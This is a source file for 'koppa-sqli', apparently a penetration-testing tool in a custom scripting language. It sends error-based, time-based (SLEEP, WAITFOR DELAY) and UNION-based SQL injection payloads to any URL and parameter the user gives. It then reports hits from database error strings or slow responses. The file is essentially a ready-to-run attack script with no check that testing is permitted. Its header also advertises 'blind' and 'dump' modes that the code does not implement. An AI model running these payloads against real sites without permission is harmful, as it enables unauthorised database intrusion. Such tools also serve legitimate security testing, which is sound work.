# koppa-sqli v1.0 — SQL Injection tester
# Usage: koppa run koppa-sqli <url> <param> [error|blind|time|dump]

import http, fuzz, encode, parse, log, report

let PAYLOADS_ERROR = ["'", "\"", "' OR '1'='1", "' OR 1=1--",
                      "1 ORDER BY 1--", "1 ORDER BY 99--",
                      "' UNION SELECT NULL--", "1 AND 1=2"]
let ERROR_SIGS = ["sql syntax", "mysql_fetch", "ora-", "unterminated",
                  "odbc", "sqlite", "pg_query", "syntax error"]

fn cmd_error(url, param) {
    log.info("===== Error-Based SQLi: {url} [{param}] =====")
    let findings = []
    for pay in PAYLOADS_ERROR {
        let enc  = encode.url_encode(pay)
        let resp = http.get("{url}?{param}={enc}")
        let body = resp.body
        for sig in ERROR_SIGS {
            if body.contains(sig) {
                log.success("[+] SQLi confirmed! Payload: {pay}  Sig: {sig}")
                findings.push(report.finding("SQL Injection", "Critical", "Payload: {pay}"))
            }
        }
    }
    if findings.len == 0 { log.warn("[-] No error-based SQLi detected") }
    return findings
}

fn cmd_time(url, param) {
    log.info("===== Time-Based Blind SQLi =====")
    let payloads = ["' OR SLEEP(5)--", "1; SELECT SLEEP(5)--",
                    "' AND SLEEP(5) AND '1'='1", "1 WAITFOR DELAY '0:0:5'--"]
    for pay in payloads {
        let enc   = encode.url_encode(pay)
        let t0    = sys.time_ms()
        http.get("{url}?{param}={enc}")
        let elapsed = sys.time_ms() - t0
        if elapsed > 4500 {
            log.success("[+] Time-based SQLi! Payload: {pay}  ({elapsed}ms)")
            return true
        }
    }
    log.warn("[-] No time-based SQLi detected")
    return false
}

fn cmd_union(url, param, cols) {
    log.info("===== UNION-Based SQLi (cols={cols}) =====")
    let nulls = []
    let i = 0
    for col in [1, 2, 3, 4, 5, 6] {
        if col <= cols { nulls.push("NULL") }
    }
    let pay  = "' UNION SELECT {nulls.join(',')}-- "
    let enc  = encode.url_encode(pay)
    let resp = http.get("{url}?{param}={enc}")
    log.info("Response: [{resp.status}] {resp.body.len}b")
    return resp
}

fn main() {
    let url   = __args__[0]
    let param = __args__[1]
    let mode  = __args__[2]

    if not url or not param {
        log.warn("Usage: koppa run koppa-sqli <url> <param> [error|time|union <cols>]")
        return
    }

    log.info("===== KOPPA SQLi Tester v1.0 =====")
    log.info("Target: {url}?{param}=...")

    if not mode or mode == "error" { cmd_error(url, param) }
    if mode == "time"  { cmd_time(url, param) }
    if mode == "union" {
        let cols = __args__[3]
        cmd_union(url, param, cols)
    }

    log.success("SQLi test complete!")
}
